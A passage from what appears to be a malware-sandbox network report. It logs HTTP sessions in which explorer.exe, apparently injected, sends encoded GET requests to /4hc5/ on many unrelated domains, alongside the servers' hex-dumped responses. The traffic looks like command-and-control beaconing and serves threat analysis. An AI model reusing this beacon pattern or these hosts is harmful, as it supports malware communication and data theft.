                                                                                                              Oct 26, 2023 09:47:17.034360886 CEST61INData Raw: 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 30 75 39 52 46 31 78 53 42 70 30 6b 6c 73 51 54 76 52 52 42 6a 39 73 79 4c 48 74 6f 6f 56 2f 4c 6f 61 48 4d 4b 35 53 5a 75 74 68 64 67 47 59 4e 34 41 63 57 65 4a 4c 77 38 6f 41 44 4c 45 63 61 2b
                                                                                                              Data Ascii: HU4LENMCAwEAAQ==_0u9RF1xSBp0klsQTvRRBj9syLHtooV/LoaHMK5SZuthdgGYN4AcWeJLw8oADLEca+Qpy/xXZB1OaBxCnWUWACQ==","tid":3199,"buybox":false,"buyboxTopic":true,"disclaimer":true,"imprint":false,"searchbox":true,"noFollow":faAE6lse,"slsh":false,"pp


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              1192.168.2.4497473.64.163.5080C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Oct 26, 2023 09:47:37.390469074 CEST119OUTGET /4hc5/?P6=aEvA5DdolFnSpG3wqqUvIRZQPhFuP/nqnfvGSsdAIfGqv2pNtxEQnoAbm37B6N+rsMpI&ntxh9=V48LzvX0 HTTP/1.1
                                                                                                              Host: www.bollywood.nexus
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Oct 26, 2023 09:47:37.570867062 CEST120INHTTP/1.1 410 Gone
                                                                                                              Server: openresty
                                                                                                              Date: Thu, 26 Oct 2023 07:47:37 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 66 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 62 6f 6c 6c 79 77 6f 6f 64 2e 6e 65 78 75 73 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 7<html>9 <head>4f <meta http-equiv='refresh' content='0; url=http://www.bollywood.nexus/' />a </head>8</html>0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              2192.168.2.449748103.120.80.11180C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Oct 26, 2023 09:47:58.535069942 CEST120OUTGET /4hc5/?ntxh9=V48LzvX0&P6=245SFh9gPs7u7SMvCZq1WQwUtHwLu6OXJLdJjwoxg6CFn9y4LEhCSrC/ms6Ftk+AVu/2 HTTP/1.1
                                                                                                              Host: www.lpqxmz.site
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Oct 26, 2023 09:47:58.844593048 CEST121INHTTP/1.1 200 OK
                                                                                                              Server: wts/1.7.0
                                                                                                              Date: Thu, 26 Oct 2023 07:48:56 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Vary: Accept-Encoding
                                                                                                              ETag: "64daefaa-1a1c"
                                                                                                              Data Raw: 31 61 32 35 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 6c 70 71 78 6d 7a 2e 73 69 74 65 2d d5 fd d4 da ce f7 b2 bf ca fd c2 eb 28 77 77 77 2e 77 65 73 74 2e 63 6e 29 bd f8 d0 d0 bd bb d2 d7 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 66 69 31 32 33 2e 6f 6e 6c 69 6e 65 2c 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                                              Data Ascii: 1a25<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>lpqxmz.site-(www.west.cn)</title> <meta name="description" content="wifi123.online," /> <meta name="keywords" conten
                                                                                                              Oct 26, 2023 09:47:58.844628096 CEST122INData Raw: 74 3d 22 77 69 66 69 31 32 33 2e 6f 6e 6c 69 6e 65 2c 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68
                                                                                                              Data Ascii: t="wifi123.online," /> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <style> body { line-height: 1.6; background-color: #fff; } body,
                                                                                                              Oct 26, 2023 09:47:58.844665051 CEST122INData Raw: 20 20 20 20 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 61 6e 74 69 61 6c 69 61 73 65 64 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2d 6d
                                                                                                              Data Ascii: color: #666; -webkit-font-smoothing: antialiased; -moz-font-smoothing: antialiased; } html, body { height: 100%; } html, body,
                                                                                                              Oct 26, 2023 09:47:58.844698906 CEST123INData Raw: 0a 20 20 20 20 20 20 20 20 74 64 2c 0d 0a 20 20 20 20 20 20 20 20 66 69 65 6c 64 73 65 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d
                                                                                                              Data Ascii: td, fieldset { margin: 0; padding: 0; } .wrap { margin: 0px auto; min-width: 990px; max-width: 1190px }
                                                                                                              Oct 26, 2023 09:47:58.844732046 CEST123INData Raw: 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 30 20 32 30 70 78 20 30 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 2e 6f 72 61 6e 67 65 62 74 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62
                                                                                                              Data Ascii: padding: 0 0 20px 0 } .orangebtn { background-color: #ff8400; display: inline-block; padding: 0px 20px; color: #fff; height: 50px; l
                                                                                                              Oct 26, 2023 09:47:58.844765902 CEST124INData Raw: 20 34 38 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 65 66 66 30 37 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d
                                                                                                              Data Ascii: 48px; color: #feff07; font-family: Tahoma, sans-serif; padding: 60px 0 20px 0 } .banner1 p { color: #fff; font-size: 20px; }
                                                                                                              Oct 26, 2023 09:47:58.844803095 CEST125INData Raw: 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 33 32 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a
                                                                                                              Data Ascii: 100%; margin-right: 320px; font-size: 16px } .domainout { padding: 50px 380px 50px 100px } .domainout p { line-height: 50px;
                                                                                                              Oct 26, 2023 09:47:58.844855070 CEST125INData Raw: 20 20 20 20 20 2e 72 69 67 68 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 37 38 30 64 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a
                                                                                                              Data Ascii: .right { background-color: #2780d9; height: 100%; width: 320px; position: absolute; right: 50px; top: 0; color: #fff; padding: 0px 20p
                                                                                                              Oct 26, 2023 09:47:58.844888926 CEST126INData Raw: 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 2e 69 6d 67 70 69 63 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 35 70 78 20 30 20 32 30 70 78 20 30 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 0d 0a
                                                                                                              Data Ascii: .imgpic { padding: 25px 0 20px 0 } .contact { margin-left: 50px } .contact p { line-height: 40px } a {
                                                                                                              Oct 26, 2023 09:47:58.844921112 CEST126INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 2e 66 6f 6f 74 65 72 2d 6c 69 6e 6b 20 61 3a 68 6f 76 65 72 20 7b 0d 0a 20 20 20
                                                                                                              Data Ascii: color: #666; } .footer-link a:hover { color: #ff8400; } .footer-link span { padding: 0 6px; } </style></head><body> <div cla
                                                                                                              Oct 26, 2023 09:47:59.154012918 CEST127INData Raw: 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 65 73 74 2e 63 6e 2f 79 6b 6a 2f 76 69 65 77 2e 61 73 70 3f 64 6f 6d 61 69 6e 3d 6c 70 71 78 6d 7a 2e 73 69 74 65 22 20 63 6c 61 73 73 3d
                                                                                                              Data Ascii: ><span></span><a href="https://www.west.cn/ykj/view.asp?domain=lpqxmz.site" class="orangebtn" target="_blank">Buy it !</a></p> </div> </div> <div class="main-out "> <div class="wrap "> <div


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              3192.168.2.44974913.32.208.7280C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Oct 26, 2023 09:48:38.253900051 CEST130OUTGET /4hc5/?ntxh9=V48LzvX0&P6=ZsWAow+yf8BBfalQduY7CMj5L6CLJOwgwJ6AETMAgkoaDSvJRnGnN78buAKwp8K6m6Gx HTTP/1.1
                                                                                                              Host: www.therealnikib.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Oct 26, 2023 09:48:38.347337008 CEST130INHTTP/1.1 301 Moved Permanently
                                                                                                              Server: CloudFront
                                                                                                              Date: Thu, 26 Oct 2023 07:48:38 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 167
                                                                                                              Connection: close
                                                                                                              Location: https://www.therealnikib.com/4hc5/?ntxh9=V48LzvX0&P6=ZsWAow+yf8BBfalQduY7CMj5L6CLJOwgwJ6AETMAgkoaDSvJRnGnN78buAKwp8K6m6Gx
                                                                                                              X-Cache: Redirect from cloudfront
                                                                                                              Via: 1.1 c396de17c1b5d58233088e40dd170cf4.cloudfront.net (CloudFront)
                                                                                                              X-Amz-Cf-Pop: IAD66-C1
                                                                                                              X-Amz-Cf-Id: lmhw_IO_HsjgvFsktqYEZufXEYOtCoa5QYMvN5v1qbdbXqs8KtLbcw==
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              4192.168.2.44975045.64.97.6080C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Oct 26, 2023 09:48:59.501363039 CEST131OUTGET /4hc5/?P6=Td1U1SjQUadfC3cbiTsqgzapHPyB/huuK+NgSE3DJAe+OSZ8lo2ZhtJstkIbAvBbRddo&ntxh9=V48LzvX0 HTTP/1.1
                                                                                                              Host: www.slotjitu88.website
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Oct 26, 2023 09:48:59.829467058 CEST133INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 26 Oct 2023 07:48:59 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Server: imunify360-webshield/1.21
                                                                                                              Last-Modified: Thursday, 26-Oct-2023 07:48:59 GMT
                                                                                                              Cache-Control: private, no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0
                                                                                                              cf-edge-cache: no-cache
                                                                                                              Data Raw: 35 35 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 6c 65 61 73 65 20 77 61 69 74 20 77 68 69 6c 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 69 73 20 62 65 69 6e 67 20 76 65 72 69 66 69 65 64 2e 2e 2e 3c 2f 68 31 3e 0a 3c 66 6f 72 6d 20 69 64 3d 22 77 73 69 64 63 68 6b 2d 66 6f 72 6d 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 20 61 63 74 69 6f 6e 3d 22 2f 7a 30 66 37 36 61 31 64 31 34 66 64 32 31 61 38 66 62 35 66 64 30 64 30 33 65 30 66 64 63 33 64 33 63 65 64 61 65 35 32 66 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 77 73 69 64 63 68 6b 22 20 6e 61 6d 65 3d 22 77 73 69 64 63 68 6b 22 2f 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 77 65 73 74 3d 2b 28 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 65 61 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21
                                                                                                              Data Ascii: 553<!doctype html><html><head><meta charset="utf-8"><meta name="robots" content="noindex, nofollow"><title>One moment, please...</title><style>body { background: #F6F7F8; color: #303131; font-family: sans-serif; margin-top: 45vh; text-align: center;}</style></head><body><h1>Please wait while your request is being verified...</h1><form id="wsidchk-form" style="display:none;" action="/z0f76a1d14fd21a8fb5fd0d03e0fdc3d3cedae52f" method="get"><input type="hidden" id="wsidchk" name="wsidchk"/></form><script>(function(){ var west=+((+!+[])+(+!+[]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+[])+(+!+[]+!![]+!![]+!![])+(+!+[]+!![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])), east=+((+!+[]+!![]+!![]+!![]+!![]+!![]+!![])+(+![]+[])+(+!+[]+!![]+!![]+!![]+!![]+!![])+(+!+[]+!![]+!![]+!![]+[])+(+!+[]+!![]+!![])+(+!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!
                                                                                                              Oct 26, 2023 09:48:59.829545021 CEST133INData Raw: 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 21 21 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3b 7d
                                                                                                              Data Ascii: ![]+!![]+[])+(+!+[])), x=function(){try{return !!window.addEventListener;}catch(e){return !!0;} }, y=function(y,z){x() ? document.addEventListener("DOMContentLoaded",y,z) : document.attachEvent("onreadystatechange",y);}; y(
                                                                                                              Oct 26, 2023 09:48:59.829579115 CEST133INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              5192.168.2.449751154.205.127.20180C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Oct 26, 2023 09:49:19.774091005 CEST134OUTGET /4hc5/?ntxh9=V48LzvX0&P6=+hA7uXL5jVPzGINsph1HMOS2s85bj4EjFJl4zpmGLwt9ugtIZyEmNObkflq2ofsafzQv HTTP/1.1
                                                                                                              Host: www.iqixuehe.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Oct 26, 2023 09:49:19.937040091 CEST135INHTTP/1.1 200 OK
                                                                                                              Server: nginx
                                                                                                              Date: Thu, 26 Oct 2023 07:49:28 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 785
                                                                                                              Connection: close
                                                                                                              Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e d2 cb b4 ba ce b8 b6 b2 bb f5 d4 cb b4 fa c0 ed d3 d0 cf de b9 ab cb be 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0d 0a 20 20 20 20 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 7a 7a 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 6c 69 6e 6b 73 75 62 6d 69 74 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 3a 2f 2f 70 75 73 68 2e 7a 68 61 6e 7a 68 61 6e 67 2e 62 61 69 64 75 2e 63 6f 6d 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0d 0a 20 20 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 62 70 2c 20 73 29 3b 0d 0a 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 63 6f 6d 6d 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 74 6a 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                              Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></head><script language="javascript" type="text/javascript" src="/common.js"></script><script language="javascript" type="text/javascript" src="/tj.js"></script></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              6192.168.2.449752199.34.228.19180C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Oct 26, 2023 09:49:39.892247915 CEST136OUTGET /4hc5/?P6=tOmE+Tzzb7HQLc2SkeB2EXcbcJrVSgBrP2Nr0WPSkAyRu+Yjx9aruD7HNlgfCbohliLP&ntxh9=V48LzvX0 HTTP/1.1
                                                                                                              Host: www.candicrem.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Oct 26, 2023 09:49:40.089838982 CEST137INHTTP/1.1 302 Found
                                                                                                              Server: nginx
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Cache-Control: no-cache, private
                                                                                                              Date: Thu, 26 Oct 2023 07:49:39 GMT
                                                                                                              Location: https://www.candicrem.com/4hc5
                                                                                                              Set-Cookie: publishedsite-xsrf=eyJpdiI6IlNxc25pQkpmSCtiQXljQTFtQ2tna1E9PSIsInZhbHVlIjoiZUx3cVFiZFNKUGg5Ujd4V0pPcUNBQkRJbmFBMjBVNkk1TmJvZ0hNd2gwRmc5bktrMGMxTnNaaTZ2WkdrQWpTNWxDd3haRnowRS9FeGhqK0h0SjRhUFNzN3IxWXFDRzd3eXNPckVWeitRVHRua2JnMHpCRWRBMXhTdDhBOEFGSCsiLCJtYWMiOiI4YWM3MTQxMWI2NDcyZjNiYTUzNzdjNGEwMmQwNjZjZjk3ZjAyNTliM2I1NjgzMWVmM2Y1MzNlZjhhY2U0YTE2IiwidGFnIjoiIn0%3D; expires=Thu, 09-Nov-2023 07:49:39 GMT; Max-Age=1209600; path=/; samesite=lax
                                                                                                              Set-Cookie: XSRF-TOKEN=eyJpdiI6IktTVDZsNTNsZHlReXQ3Q2NVUjlobkE9PSIsInZhbHVlIjoiUk9SdHNCcVJkQTc3dktHSlBITEo5MGYvdUoxeEZrU2EwL1VEMVZmUEhvMkxBVkdMK3NsK0ZnMHJHVVVETzFSY1BJYzlNSWpseUZvUmduYXI0WFAxTGJYTzY2L0ZrWkx3bkRTaGovUWlUOUpYQXc4bVIwa2RJQms2c3pOWmVSQ2oiLCJtYWMiOiJiOTA2NGNmOWUwZjBiNDNlZTE5MzlmMjg1MjZiMzA4Y2QxMTBkM2Y4OGU0Y2QyNzViZmRhOGI2Mjk5NTRlNjJkIiwidGFnIjoiIn0%3D; expires=Thu, 09-Nov-2023 07:49:39 GMT; Max-Age=1209600; path=/; samesite=lax
                                                                                                              Set-Cookie: PublishedSiteSession=eyJpdiI6IkVaeUdFd3VRYjFmMzBDL2JKeHJ5YUE9PSIsInZhbHVlIjoiejh2Q3pCVG9HWFUwb1dFVVNLK0RkY0s3YlFaNGgyMXlYM3MrMy9PSGZNZm
                                                                                                              Data Raw:
